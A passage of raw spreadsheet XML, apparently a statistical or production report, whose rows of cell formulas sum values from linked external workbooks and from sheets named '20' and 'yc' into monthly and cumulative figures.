        <f>J25+'20'!K25</f>
        <v>473.78</v>
      </c>
      <c r="L25" s="194">
        <f>K25+yc!L25</f>
        <v>79794.63</v>
      </c>
      <c r="M25" s="194"/>
      <c r="N25" s="195"/>
      <c r="O25" s="199"/>
      <c r="P25" s="219"/>
      <c r="Q25" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R25" s="209">
        <f>'[14]21'!$R$7</f>
        <v>184.208333333333</v>
      </c>
      <c r="S25" s="209">
        <f>'[14]21'!$S$7</f>
        <v>195.620783956244</v>
      </c>
      <c r="T25" s="209">
        <f>'[14]21'!$T$7</f>
        <v>188.085169764687</v>
      </c>
      <c r="U25" s="209">
        <f>'[14]21'!$O$7</f>
        <v>100</v>
      </c>
      <c r="V25" s="209">
        <f>'[14]21'!$P$7</f>
        <v>54.4146825396825</v>
      </c>
      <c r="W25" s="209">
        <f>'[14]21'!$Q$7</f>
        <v>50.4322769953052</v>
      </c>
      <c r="X25" s="209">
        <f>'[14]21'!$L$7</f>
        <v>24</v>
      </c>
      <c r="Y25" s="209">
        <f>'[14]21'!$M$7</f>
        <v>274.25</v>
      </c>
      <c r="Z25" s="209">
        <f>'[14]21'!$N$7</f>
        <v>4296.83</v>
      </c>
    </row>
    <row r="26" ht="15.75" customHeight="1" spans="1:26">
      <c r="A26" s="191"/>
      <c r="B26" s="193" t="s">
        <v>253</v>
      </c>
      <c r="C26" s="193"/>
      <c r="D26" s="193"/>
      <c r="E26" s="194"/>
      <c r="F26" s="194"/>
      <c r="G26" s="194"/>
      <c r="H26" s="194">
        <f>G26+'20'!H26</f>
        <v>0</v>
      </c>
      <c r="I26" s="194">
        <f>H26+yc!I26</f>
        <v>0</v>
      </c>
      <c r="J26" s="194">
        <f>J27+J30</f>
        <v>0</v>
      </c>
      <c r="K26" s="194">
        <f>J26+'20'!K26</f>
        <v>0</v>
      </c>
      <c r="L26" s="194">
        <f>K26+yc!L26</f>
        <v>0</v>
      </c>
      <c r="M26" s="194"/>
      <c r="N26" s="195"/>
      <c r="O26" s="199"/>
      <c r="P26" s="191" t="s">
        <v>263</v>
      </c>
      <c r="Q26" s="193" t="s">
        <v>235</v>
      </c>
      <c r="R26" s="209">
        <f>'[15]21'!$I$38</f>
        <v>0</v>
      </c>
      <c r="S26" s="209">
        <f>'[15]21'!$J$38</f>
        <v>0</v>
      </c>
      <c r="T26" s="209">
        <f>'[15]21'!$K$38</f>
        <v>0</v>
      </c>
      <c r="U26" s="209">
        <f>'[15]21'!$F$38</f>
        <v>0</v>
      </c>
      <c r="V26" s="209">
        <f>'[15]21'!$G$38</f>
        <v>0</v>
      </c>
      <c r="W26" s="209">
        <f>'[15]21'!$H$38</f>
        <v>0</v>
      </c>
      <c r="X26" s="209">
        <f>'[15]21'!$C$38</f>
        <v>0</v>
      </c>
      <c r="Y26" s="209">
        <f>'[15]21'!$D$38</f>
        <v>0</v>
      </c>
      <c r="Z26" s="209">
        <f>'[15]21'!$E$38</f>
        <v>0</v>
      </c>
    </row>
    <row r="27" ht="15.75" customHeight="1" spans="1:26">
      <c r="A27" s="191"/>
      <c r="B27" s="193" t="s">
        <v>254</v>
      </c>
      <c r="C27" s="193"/>
      <c r="D27" s="193"/>
      <c r="E27" s="194">
        <v>190000</v>
      </c>
      <c r="F27" s="194"/>
      <c r="G27" s="194"/>
      <c r="H27" s="194">
        <f>G27+'20'!H27</f>
        <v>0</v>
      </c>
      <c r="I27" s="194">
        <f>H27+yc!I27</f>
        <v>0</v>
      </c>
      <c r="J27" s="194">
        <f>SUM(J28:J29)</f>
        <v>0</v>
      </c>
      <c r="K27" s="194">
        <f>J27+'20'!K27</f>
        <v>0</v>
      </c>
      <c r="L27" s="194">
        <f>K27+yc!L27</f>
        <v>0</v>
      </c>
      <c r="M27" s="194"/>
      <c r="N27" s="195"/>
      <c r="O27" s="220" t="s">
        <v>264</v>
      </c>
      <c r="P27" s="191" t="s">
        <v>237</v>
      </c>
      <c r="Q27" s="191"/>
      <c r="R27" s="209">
        <f>'[11]21'!$W$69</f>
        <v>0</v>
      </c>
      <c r="S27" s="209">
        <f>'[11]21'!$X$69</f>
        <v>22.5925764408544</v>
      </c>
      <c r="T27" s="209">
        <f>'[11]21'!$Y$69</f>
        <v>25.1966540548776</v>
      </c>
      <c r="U27" s="221">
        <f>'[11]21'!$T$69</f>
        <v>0</v>
      </c>
      <c r="V27" s="209">
        <f>'[11]21'!$U$69</f>
        <v>75.7242063492063</v>
      </c>
      <c r="W27" s="209">
        <f>'[11]21'!$V$69</f>
        <v>68.8090375586854</v>
      </c>
      <c r="X27" s="209" t="str">
        <f>'[11]21'!$Q$69</f>
        <v>0.00</v>
      </c>
      <c r="Y27" s="209" t="str">
        <f>'[11]21'!$R$69</f>
        <v>381.65</v>
      </c>
      <c r="Z27" s="209" t="str">
        <f>'[11]21'!$S$69</f>
        <v>5862.53</v>
      </c>
    </row>
    <row r="28" ht="15.75" customHeight="1" spans="1:26">
      <c r="A28" s="191"/>
      <c r="B28" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C28" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D28" s="193"/>
      <c r="E28" s="194"/>
      <c r="F28" s="194"/>
      <c r="G28" s="194"/>
      <c r="H28" s="194">
        <f>G28+'20'!H28</f>
        <v>0</v>
      </c>
      <c r="I28" s="194">
        <f>H28+yc!I28</f>
        <v>0</v>
      </c>
      <c r="J28" s="194"/>
      <c r="K28" s="194">
        <f>J28+'20'!K28</f>
        <v>0</v>
      </c>
      <c r="L28" s="194">
        <f>K28+yc!L28</f>
        <v>0</v>
      </c>
      <c r="M28" s="194"/>
      <c r="N28" s="195"/>
      <c r="O28" s="222"/>
      <c r="P28" s="223" t="s">
        <v>306</v>
      </c>
      <c r="Q28" s="224"/>
      <c r="R28" s="209">
        <f>'[10]21'!$W$104</f>
        <v>0</v>
      </c>
      <c r="S28" s="209">
        <f>'[10]21'!$X$104</f>
        <v>28.3179061602293</v>
      </c>
      <c r="T28" s="209">
        <f>'[10]21'!$Y$104</f>
        <v>26.0491177026315</v>
      </c>
      <c r="U28" s="209">
        <f>'[10]21'!$T$104</f>
        <v>0</v>
      </c>
      <c r="V28" s="209">
        <f>'[10]21'!$U$104</f>
        <v>45.8267857142857</v>
      </c>
      <c r="W28" s="209">
        <f>'[10]21'!$V$104</f>
        <v>63.2748474178404</v>
      </c>
      <c r="X28" s="209">
        <f>'[10]21'!$Q$104</f>
        <v>0</v>
      </c>
      <c r="Y28" s="209">
        <f>'[10]21'!$R$104</f>
        <v>230.967</v>
      </c>
      <c r="Z28" s="209">
        <f>'[10]21'!$S$104</f>
        <v>5391.017</v>
      </c>
    </row>
    <row r="29" ht="15.75" customHeight="1" spans="1:26">
      <c r="A29" s="191"/>
      <c r="B29" s="191"/>
      <c r="C29" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D29" s="193"/>
      <c r="E29" s="194"/>
      <c r="F29" s="194"/>
      <c r="G29" s="194"/>
      <c r="H29" s="194">
        <f>G29+'20'!H29</f>
        <v>0</v>
      </c>
      <c r="I29" s="194">
        <f>H29+yc!I29</f>
        <v>0</v>
      </c>
      <c r="J29" s="194"/>
      <c r="K29" s="194">
        <f>J29+'20'!K29</f>
        <v>0</v>
      </c>
      <c r="L29" s="194">
        <f>K29+yc!L29</f>
        <v>0</v>
      </c>
      <c r="M29" s="225"/>
      <c r="N29" s="195"/>
      <c r="O29" s="222"/>
      <c r="P29" s="223" t="s">
        <v>307</v>
      </c>
      <c r="Q29" s="224"/>
      <c r="R29" s="209">
        <f>'[10]21'!$W$105</f>
        <v>0</v>
      </c>
      <c r="S29" s="209">
        <f>'[10]21'!$X$105</f>
        <v>0</v>
      </c>
      <c r="T29" s="209">
        <f>'[10]21'!$Y$105</f>
        <v>29.9342377123697</v>
      </c>
      <c r="U29" s="209">
        <f>'[10]21'!$T$105</f>
        <v>0</v>
      </c>
      <c r="V29" s="209">
        <f>'[10]21'!$U$105</f>
        <v>0</v>
      </c>
      <c r="W29" s="209">
        <f>'[10]21'!$V$105</f>
        <v>32.9129342723005</v>
      </c>
      <c r="X29" s="209">
        <f>'[10]21'!$Q$105</f>
        <v>0</v>
      </c>
      <c r="Y29" s="209">
        <f>'[10]21'!$R$105</f>
        <v>0</v>
      </c>
      <c r="Z29" s="209">
        <f>'[10]21'!$S$105</f>
        <v>2804.182</v>
      </c>
    </row>
    <row r="30" ht="15.75" customHeight="1" spans="1:26">
      <c r="A30" s="191"/>
      <c r="B30" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C30" s="193"/>
      <c r="D30" s="193"/>
      <c r="E30" s="194"/>
      <c r="F30" s="194"/>
      <c r="G30" s="194"/>
      <c r="H30" s="194">
        <f>G30+'20'!H30</f>
        <v>0</v>
      </c>
      <c r="I30" s="194">
        <f>H30+yc!I30</f>
        <v>0</v>
      </c>
      <c r="J30" s="194"/>
      <c r="K30" s="194">
        <f>J30+'20'!K30</f>
        <v>0</v>
      </c>
      <c r="L30" s="194">
        <f>K30+yc!L30</f>
        <v>0</v>
      </c>
      <c r="M30" s="225"/>
      <c r="N30" s="195"/>
      <c r="O30" s="222"/>
      <c r="P30" s="223" t="s">
        <v>252</v>
      </c>
      <c r="Q30" s="224"/>
      <c r="R30" s="209">
        <f>'[12]21'!$W$72</f>
        <v>0</v>
      </c>
      <c r="S30" s="226">
        <f>'[12]21'!$X$72</f>
        <v>0</v>
      </c>
      <c r="T30" s="209">
        <f>'[12]21'!$Y$72</f>
        <v>0</v>
      </c>
      <c r="U30" s="209">
        <f>'[12]21'!$T$72</f>
        <v>0</v>
      </c>
      <c r="V30" s="209">
        <f>'[12]21'!$U$72</f>
        <v>0</v>
      </c>
      <c r="W30" s="209">
        <f>'[12]21'!$V$72</f>
        <v>0</v>
      </c>
      <c r="X30" s="209">
        <f>'[12]21'!$Q$72</f>
        <v>0</v>
      </c>
      <c r="Y30" s="209">
        <f>'[12]21'!$R$72</f>
        <v>0</v>
      </c>
      <c r="Z30" s="209">
        <f>'[12]21'!$S$72</f>
        <v>0</v>
      </c>
    </row>
    <row r="31" ht="15.75" customHeight="1" spans="1:26">
      <c r="A31" s="191" t="s">
        <v>237</v>
      </c>
      <c r="B31" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C31" s="193"/>
      <c r="D31" s="193"/>
      <c r="E31" s="194">
        <v>150000</v>
      </c>
      <c r="F31" s="194">
        <f>'[11]21'!$D$16</f>
        <v>65429.37</v>
      </c>
      <c r="G31" s="194">
        <f>'[11]21'!$E$16</f>
        <v>3197</v>
      </c>
      <c r="H31" s="194">
        <f>G31+'20'!H31</f>
        <v>99810</v>
      </c>
      <c r="I31" s="194">
        <f>H31+yc!I31</f>
        <v>1472817</v>
      </c>
      <c r="J31" s="194">
        <f>'[11]21'!$I$16</f>
        <v>4133.90000000001</v>
      </c>
      <c r="K31" s="194">
        <f>J31+'20'!K31</f>
        <v>100411.46</v>
      </c>
      <c r="L31" s="194">
        <f>K31+yc!L31</f>
        <v>1456459.59</v>
      </c>
      <c r="M31" s="225">
        <f>'[11]21'!$L$16</f>
        <v>64827.91</v>
      </c>
      <c r="N31" s="195">
        <f>M31/75000*100</f>
        <v>86.4372133333333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'[11]21'!$D$13</f>
        <v>60437.506</v>
      </c>
      <c r="G32" s="194">
        <f>'[11]21'!$E$13</f>
        <v>0</v>
      </c>
      <c r="H32" s="194">
        <f>G32+'20'!H32</f>
        <v>103074</v>
      </c>
      <c r="I32" s="194">
        <f>H32+yc!I32</f>
        <v>1630917</v>
      </c>
      <c r="J32" s="194">
        <f>'[11]21'!$I$13</f>
        <v>2121</v>
      </c>
      <c r="K32" s="194">
        <f>J32+'20'!K32</f>
        <v>73588</v>
      </c>
      <c r="L32" s="194">
        <f>K32+yc!L32</f>
        <v>1095066</v>
      </c>
      <c r="M32" s="225">
        <f>'[11]21'!$L$13</f>
        <v>71867.796</v>
      </c>
      <c r="N32" s="207">
        <f>(M32+M33)/50000*100</f>
        <v>143.735592</v>
      </c>
      <c r="O32" s="222"/>
      <c r="P32" s="223" t="s">
        <v>308</v>
      </c>
      <c r="Q32" s="224"/>
      <c r="R32" s="209">
        <f>'[13]21'!$W$76</f>
        <v>0</v>
      </c>
      <c r="S32" s="209">
        <f>'[13]21'!$X$76</f>
        <v>0</v>
      </c>
      <c r="T32" s="209">
        <f>'[13]21'!$Y$76</f>
        <v>0</v>
      </c>
      <c r="U32" s="209">
        <f>'[13]21'!$T$76</f>
        <v>4.16666666666667e-11</v>
      </c>
      <c r="V32" s="209">
        <f>'[13]21'!$U$76</f>
        <v>3.96825396825397e-11</v>
      </c>
      <c r="W32" s="209">
        <f>'[13]21'!$V$76</f>
        <v>4.10798122065728e-11</v>
      </c>
      <c r="X32" s="209">
        <f>'[13]21'!$Q$76</f>
        <v>1e-11</v>
      </c>
      <c r="Y32" s="209">
        <f>'[13]21'!$R$76</f>
        <v>2e-10</v>
      </c>
      <c r="Z32" s="209">
        <f>'[13]21'!$S$76</f>
        <v>3.5e-9</v>
      </c>
    </row>
    <row r="33" ht="15.75" customHeight="1" spans="1:26">
      <c r="A33" s="191"/>
      <c r="B33" s="193"/>
      <c r="C33" s="193"/>
      <c r="D33" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E33" s="194"/>
      <c r="F33" s="194"/>
      <c r="G33" s="194">
        <f>'[11]21'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H33" s="194">
        <f>G33+'20'!H33</f>
        <v>0</v>
      </c>
      <c r="I33" s="194">
        <f>H33+yc!I33</f>
        <v>0</v>
      </c>
      <c r="J33" s="194">
        <f>'[11]21'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K33" s="194">
        <f>J33+'20'!K33</f>
        <v>0</v>
      </c>
      <c r="L33" s="194">
        <f>K33+yc!L33</f>
        <v>0</v>
      </c>
      <c r="M33" s="225">
        <f>'[11]21'!$L$14</f>
        <v>0</v>
      </c>
      <c r="N33" s="212"/>
      <c r="O33" s="222"/>
      <c r="P33" s="223" t="s">
        <v>309</v>
      </c>
      <c r="Q33" s="224"/>
      <c r="R33" s="209">
        <f>'[13]21'!$W$77</f>
        <v>17.42</v>
      </c>
      <c r="S33" s="209">
        <f>'[13]21'!$X$77</f>
        <v>17.42</v>
      </c>
      <c r="T33" s="209">
        <f>'[13]21'!$Y$77</f>
        <v>19.77</v>
      </c>
      <c r="U33" s="209">
        <f>'[13]21'!$T$77</f>
        <v>50.6250000000417</v>
      </c>
      <c r="V33" s="209">
        <f>'[13]21'!$U$77</f>
        <v>2.41071428571627</v>
      </c>
      <c r="W33" s="209">
        <f>'[13]21'!$V$77</f>
        <v>59.5301643192502</v>
      </c>
      <c r="X33" s="209">
        <f>'[13]21'!$Q$77</f>
        <v>12.15000000001</v>
      </c>
      <c r="Y33" s="209">
        <f>'[13]21'!$R$77</f>
        <v>12.15000000001</v>
      </c>
      <c r="Z33" s="209">
        <f>'[13]21'!$S$77</f>
        <v>5071.97000000012</v>
      </c>
    </row>
    <row r="34" ht="15.75" customHeight="1" spans="1:26">
      <c r="A34" s="191"/>
      <c r="B34" s="193"/>
      <c r="C34" s="193" t="s">
        <v>249</v>
      </c>
      <c r="D34" s="206" t="s">
        <v>250</v>
      </c>
      <c r="E34" s="194"/>
      <c r="F34" s="194"/>
      <c r="G34" s="194">
        <f>'[11]21'!$E$50</f>
        <v>0</v>
      </c>
      <c r="H34" s="194">
        <f>G34+'20'!H34</f>
        <v>0</v>
      </c>
      <c r="I34" s="194">
        <f>H34+yc!I34</f>
        <v>0</v>
      </c>
      <c r="J34" s="194">
        <f>'[11]21'!$I$50</f>
        <v>650.939999999999</v>
      </c>
      <c r="K34" s="194">
        <f>J34+'20'!K34</f>
        <v>18055.71</v>
      </c>
      <c r="L34" s="194">
        <f>K34+yc!L34</f>
        <v>485258.64</v>
      </c>
      <c r="M34" s="225">
        <f>'[11]21'!$L$15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'[11]21'!$E$64</f>
        <v>0</v>
      </c>
      <c r="H35" s="194">
        <f>G35+'20'!H35</f>
        <v>0</v>
      </c>
      <c r="I35" s="194">
        <f>H35+yc!I35</f>
        <v>0</v>
      </c>
      <c r="J35" s="194">
        <f>'[11]21'!$I$64</f>
        <v>0</v>
      </c>
      <c r="K35" s="194">
        <f>J35+'20'!K35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G36+'20'!H36</f>
        <v>0</v>
      </c>
      <c r="I36" s="194">
        <f>H36+yc!I36</f>
        <v>0</v>
      </c>
      <c r="J36" s="194">
        <f>J37+J40</f>
        <v>0</v>
      </c>
      <c r="K36" s="194">
        <f>J36+'20'!K36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G37+'20'!H37</f>
        <v>0</v>
      </c>
      <c r="I37" s="194">
        <f>H37+yc!I37</f>
        <v>0</v>
      </c>
      <c r="J37" s="194">
        <f>SUM(J38:J39)</f>
        <v>0</v>
      </c>
      <c r="K37" s="194">
        <f>J37+'20'!K37</f>
        <v>0</v>
      </c>
      <c r="L37" s="194">
        <f>K37+yc!L37</f>
        <v>0</v>
      </c>
      <c r="M37" s="225"/>
      <c r="N37" s="195"/>
      <c r="O37" s="197" t="s">
        <v>268</v>
      </c>
      <c r="P37" s="218" t="s">
        <v>229</v>
      </c>
      <c r="Q37" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R37" s="231">
        <f>'[10]21'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S37" s="232">
        <f>'[10]21'!$Q$7</f>
        <v>0</v>
      </c>
      <c r="T37" s="233">
        <f>'[10]21'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U37" s="234">
        <f>T37+'20'!U37</f>
        <v>0</v>
      </c>
      <c r="V37" s="234">
        <f>U37+yc!V37</f>
        <v>0</v>
      </c>
      <c r="W37" s="235">
        <f>'[10]21'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X37" s="234">
        <f>W37+'20'!X37</f>
        <v>0</v>
      </c>
      <c r="Y37" s="235">
        <f>X37+yc!Y37</f>
        <v>0</v>
      </c>
      <c r="Z37" s="235">
        <f>'[10]21'!$Y$7</f>
        <v>0</v>
      </c>
    </row>
    <row r="38" ht="15.75" customHeight="1" spans="1:26">
      <c r="A38" s="191"/>
      <c r="B38" s="191" t="s">
        <v>231</v>
      </c>
      <c r="C38" s="193" t="s">
        <v>257</v>
      </c>
      <c r="D38" s="193"/>
      <c r="E38" s="194"/>
      <c r="F38" s="194"/>
      <c r="G38" s="225"/>
      <c r="H38" s="194">
        <f>G38+'20'!H38</f>
        <v>0</v>
      </c>
      <c r="I38" s="194">
        <f>H38+yc!I38</f>
        <v>0</v>
      </c>
      <c r="J38" s="194"/>
      <c r="K38" s="194">
        <f>J38+'20'!K38</f>
        <v>0</v>
      </c>
      <c r="L38" s="194">
        <f>K38+yc!L38</f>
        <v>0</v>
      </c>
      <c r="M38" s="194"/>
      <c r="N38" s="195"/>
      <c r="O38" s="200"/>
      <c r="P38" s="236"/>
      <c r="Q38" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R38" s="237">
        <f>'[10]21'!$P$10</f>
        <v>0</v>
      </c>
      <c r="S38" s="235">
        <f>'[10]21'!$Q$10</f>
        <v>9645.331</v>
      </c>
      <c r="T38" s="235">
        <f>'[10]21'!$R$10</f>
        <v>0</v>
      </c>
      <c r="U38" s="234">
        <f>T38+'20'!U38</f>
        <v>5520.34</v>
      </c>
      <c r="V38" s="234">
        <f>U38+yc!V38</f>
        <v>264660.06</v>
      </c>
      <c r="W38" s="235">
        <f>'[10]21'!$V$10</f>
        <v>0</v>
      </c>
      <c r="X38" s="234">
        <f>W38+'20'!X38</f>
        <v>7808</v>
      </c>
      <c r="Y38" s="235">
        <f>X38+yc!Y38</f>
        <v>263915</v>
      </c>
      <c r="Z38" s="235">
        <f>'[10]21'!$Y$10</f>
        <v>7357.671</v>
      </c>
    </row>
    <row r="39" ht="15.75" customHeight="1" spans="1:26">
      <c r="A39" s="191"/>
      <c r="B39" s="191"/>
      <c r="C39" s="193" t="s">
        <v>259</v>
      </c>
      <c r="D39" s="193"/>
      <c r="E39" s="194"/>
      <c r="F39" s="194"/>
      <c r="G39" s="194"/>
      <c r="H39" s="194">
        <f>G39+'20'!H39</f>
        <v>0</v>
      </c>
      <c r="I39" s="194">
        <f>H39+yc!I39</f>
        <v>0</v>
      </c>
      <c r="J39" s="194"/>
      <c r="K39" s="194">
        <f>J39+'20'!K39</f>
        <v>0</v>
      </c>
      <c r="L39" s="194">
        <f>K39+yc!L39</f>
        <v>0</v>
      </c>
      <c r="M39" s="194"/>
      <c r="N39" s="195"/>
      <c r="O39" s="200"/>
      <c r="P39" s="236"/>
      <c r="Q39" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R39" s="231">
        <f>'[10]21'!$P$50</f>
        <v>0</v>
      </c>
      <c r="S39" s="232">
        <f>'[10]21'!$Q$50</f>
        <v>1231.546</v>
      </c>
      <c r="T39" s="238">
        <f>'[10]21'!$R$50</f>
        <v>513.48</v>
      </c>
      <c r="U39" s="234">
        <f>T39+'20'!U39</f>
        <v>6448.7</v>
      </c>
      <c r="V39" s="234">
        <f>U39+yc!V39</f>
        <v>85262.299</v>
      </c>
      <c r="W39" s="235">
        <f>'[10]21'!$V$50</f>
        <v>435</v>
      </c>
      <c r="X39" s="234">
        <f>W39+'20'!X39</f>
        <v>6644</v>
      </c>
      <c r="Y39" s="235">
        <f>X39+yc!Y39</f>
        <v>85403</v>
      </c>
      <c r="Z39" s="238">
        <f>'[10]21'!$Y$50</f>
        <v>1036.246</v>
      </c>
    </row>
    <row r="40" ht="15.75" customHeight="1" spans="1:26">
      <c r="A40" s="191"/>
      <c r="B40" s="193" t="s">
        <v>261</v>
      </c>
      <c r="C40" s="193"/>
      <c r="D40" s="193"/>
      <c r="E40" s="194"/>
      <c r="F40" s="194"/>
      <c r="G40" s="225"/>
      <c r="H40" s="194">
        <f>G40+'20'!H40</f>
        <v>0</v>
      </c>
      <c r="I40" s="194">
        <f>H40+yc!I40</f>
        <v>0</v>
      </c>
      <c r="J40" s="194"/>
      <c r="K40" s="194">
        <f>J40+'20'!K40</f>
        <v>0</v>
      </c>
      <c r="L40" s="194">
        <f>K40+yc!L40</f>
        <v>0</v>
      </c>
      <c r="M40" s="194"/>
      <c r="N40" s="195"/>
      <c r="O40" s="200"/>
      <c r="P40" s="219"/>
      <c r="Q40" s="191" t="s">
        <v>280</v>
      </c>
      <c r="R40" s="239">
        <f>'[10]21'!$P$44</f>
        <v>0</v>
      </c>
      <c r="S40" s="240">
        <f>'[10]21'!$Q$44</f>
        <v>0</v>
      </c>
      <c r="T40" s="238">
        <f>'[10]21'!$R$44</f>
        <v>0</v>
      </c>
      <c r="U40" s="234">
        <f>'[10]21'!$S$44</f>
        <v>0</v>
      </c>
      <c r="V40" s="234">
        <f>'[10]21'!$T$44</f>
        <v>0</v>
      </c>
      <c r="W40" s="235">
        <f>'[10]21'!$V$44</f>
        <v>0</v>
      </c>
      <c r="X40" s="234">
        <f>'[10]21'!$W$44</f>
        <v>0</v>
      </c>
      <c r="Y40" s="235">
        <f>'[10]21'!$X$44</f>
        <v>0</v>
      </c>
      <c r="Z40" s="238">
        <f>'[10]21'!$Y$44</f>
        <v>0</v>
      </c>
    </row>
    <row r="41" ht="15.75" customHeight="1" spans="1:26">
      <c r="A41" s="191" t="s">
        <v>252</v>
      </c>
      <c r="B41" s="193" t="s">
        <v>227</v>
      </c>
      <c r="C41" s="193"/>
      <c r="D41" s="193"/>
      <c r="E41" s="194">
        <v>12000</v>
      </c>
      <c r="F41" s="194">
        <f>'[12]21'!$D$16</f>
        <v>26129.76</v>
      </c>
      <c r="G41" s="225">
        <f>'[12]21'!$E$16</f>
        <v>0</v>
      </c>
      <c r="H41" s="194">
        <f>G41+'20'!H41</f>
        <v>13016</v>
      </c>
      <c r="I41" s="194">
        <f>H41+yc!I41</f>
        <v>137992</v>
      </c>
      <c r="J41" s="194">
        <f>'[12]21'!$I$16</f>
        <v>878.07</v>
      </c>
      <c r="K41" s="194">
        <f>J41+'20'!K41</f>
        <v>17517.55</v>
      </c>
      <c r="L41" s="194">
        <f>K41+yc!L41</f>
        <v>138911.09</v>
      </c>
      <c r="M41" s="194">
        <f>'[12]21'!$L$16</f>
        <v>21628.21</v>
      </c>
      <c r="N41" s="195">
        <f>M41/30000*100</f>
        <v>72.0940333333333</v>
      </c>
      <c r="O41" s="200"/>
      <c r="P41" s="213" t="s">
        <v>237</v>
      </c>
      <c r="Q41" s="191" t="s">
        <v>277</v>
      </c>
      <c r="R41" s="239">
        <f>'[11]21'!$P$7</f>
        <v>0</v>
      </c>
      <c r="S41" s="240">
        <f>'[11]21'!$Q$7</f>
        <v>0.621</v>
      </c>
      <c r="T41" s="238">
        <f>'[11]21'!$R$7</f>
        <v>0</v>
      </c>
      <c r="U41" s="234">
        <f>T41+'20'!U41</f>
        <v>0</v>
      </c>
      <c r="V41" s="234">
        <f>U41+yc!V41</f>
        <v>0.621000000000095</v>
      </c>
      <c r="W41" s="235">
        <f>'[11]21'!$V$7</f>
        <v>0</v>
      </c>
      <c r="X41" s="234">
        <f>W41+'20'!X41</f>
        <v>0</v>
      </c>
      <c r="Y41" s="235">
        <f>X41+yc!Y41</f>
        <v>9.45910016980633e-14</v>
      </c>
      <c r="Z41" s="238">
        <f>'[11]21'!$Y$7</f>
        <v>0.621</v>
      </c>
    </row>
    <row r="42" ht="15.75" customHeight="1" spans="1:26">
      <c r="A42" s="191"/>
      <c r="B42" s="191" t="s">
        <v>244</v>
      </c>
      <c r="C42" s="193" t="s">
        <v>245</v>
      </c>
      <c r="D42" s="193" t="s">
        <v>246</v>
      </c>
      <c r="E42" s="194">
        <v>0</v>
      </c>
      <c r="F42" s="194">
        <f>'[12]21'!$D$13</f>
        <v>0</v>
      </c>
      <c r="G42" s="225">
        <f>'[12]21'!$E$13</f>
        <v>0</v>
      </c>
      <c r="H42" s="194">
        <f>G42+'20'!H42</f>
        <v>0</v>
      </c>
      <c r="I42" s="194">
        <f>H42+yc!I42</f>
        <v>0</v>
      </c>
      <c r="J42" s="194">
        <f>'[12]21'!$I$13</f>
        <v>0</v>
      </c>
      <c r="K42" s="194">
        <f>J42+'20'!K42</f>
        <v>0</v>
      </c>
      <c r="L42" s="194">
        <f>K42+yc!L42</f>
        <v>0</v>
      </c>
      <c r="M42" s="194">
        <f>'[12]21'!$L$13</f>
        <v>0</v>
      </c>
      <c r="N42" s="207">
        <f>(M42+M43)/50000*100</f>
        <v>0</v>
      </c>
      <c r="O42" s="200"/>
      <c r="P42" s="215"/>
      <c r="Q42" s="193" t="s">
        <v>278</v>
      </c>
      <c r="R42" s="237">
        <f>'[11]21'!$P$8</f>
        <v>14000</v>
      </c>
      <c r="S42" s="238">
        <f>'[11]21'!$Q$8</f>
        <v>8478.836</v>
      </c>
      <c r="T42" s="238">
        <f>'[11]21'!$R$8</f>
        <v>0</v>
      </c>
      <c r="U42" s="234">
        <f>T42+'20'!U42</f>
        <v>9627.68</v>
      </c>
      <c r="V42" s="235">
        <f>U42+yc!V42</f>
        <v>217214.65</v>
      </c>
      <c r="W42" s="235">
        <f>'[11]21'!$V$8</f>
        <v>0</v>
      </c>
      <c r="X42" s="234">
        <f>W42+'20'!X42</f>
        <v>13382</v>
      </c>
      <c r="Y42" s="235">
        <f>X42+yc!Y42</f>
        <v>215853</v>
      </c>
      <c r="Z42" s="238">
        <f>'[11]21'!$Y$8</f>
        <v>4724.516</v>
      </c>
    </row>
    <row r="43" ht="15.75" customHeight="1" spans="1:26">
      <c r="A43" s="191"/>
      <c r="B43" s="193"/>
      <c r="C43" s="193"/>
      <c r="D43" s="206" t="s">
        <v>248</v>
      </c>
      <c r="E43" s="194"/>
      <c r="F43" s="194">
        <f>'[12]21'!$D$14</f>
        <v>0</v>
      </c>
      <c r="G43" s="225">
        <f>'[12]21'!$E$14</f>
        <v>0</v>
      </c>
      <c r="H43" s="194">
        <f>G43+'20'!H43</f>
        <v>0</v>
      </c>
      <c r="I43" s="194">
        <f>H43+yc!I43</f>
        <v>0</v>
      </c>
      <c r="J43" s="194">
        <f>'[12]21'!$I$14</f>
        <v>0</v>
      </c>
      <c r="K43" s="194">
        <f>J43+'20'!K43</f>
        <v>0</v>
      </c>
      <c r="L43" s="194">
        <f>K43+yc!L43</f>
        <v>0</v>
      </c>
      <c r="M43" s="194">
        <f>'[12]21'!$L$14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'[12]21'!$E$44</f>
        <v>0</v>
      </c>
      <c r="H44" s="194">
        <f>G44+'20'!H44</f>
        <v>0</v>
      </c>
      <c r="I44" s="194">
        <f>H44+yc!I44</f>
        <v>128550.22</v>
      </c>
      <c r="J44" s="194">
        <f>'[12]21'!$I$44</f>
        <v>0</v>
      </c>
      <c r="K44" s="194">
        <f>J44+'20'!K44</f>
        <v>0</v>
      </c>
      <c r="L44" s="194">
        <f>K44+yc!L44</f>
        <v>0</v>
      </c>
      <c r="M44" s="194">
        <f>'[12]21'!$L$15</f>
        <v>57613.78</v>
      </c>
      <c r="N44" s="195"/>
      <c r="O44" s="200"/>
      <c r="P44" s="215"/>
      <c r="Q44" s="191" t="s">
        <v>279</v>
      </c>
      <c r="R44" s="237">
        <f>'[11]21'!$P$29</f>
        <v>8000</v>
      </c>
      <c r="S44" s="238">
        <f>'[11]21'!$Q$29</f>
        <v>2299.457</v>
      </c>
      <c r="T44" s="238">
        <f>'[11]21'!$R$29</f>
        <v>0</v>
      </c>
      <c r="U44" s="234">
        <f>T44+'20'!U44</f>
        <v>5257</v>
      </c>
      <c r="V44" s="235">
        <f>U44+yc!V44</f>
        <v>70010.168</v>
      </c>
      <c r="W44" s="235">
        <f>'[11]21'!$V$29</f>
        <v>138</v>
      </c>
      <c r="X44" s="234">
        <f>W44+'20'!X44</f>
        <v>3815</v>
      </c>
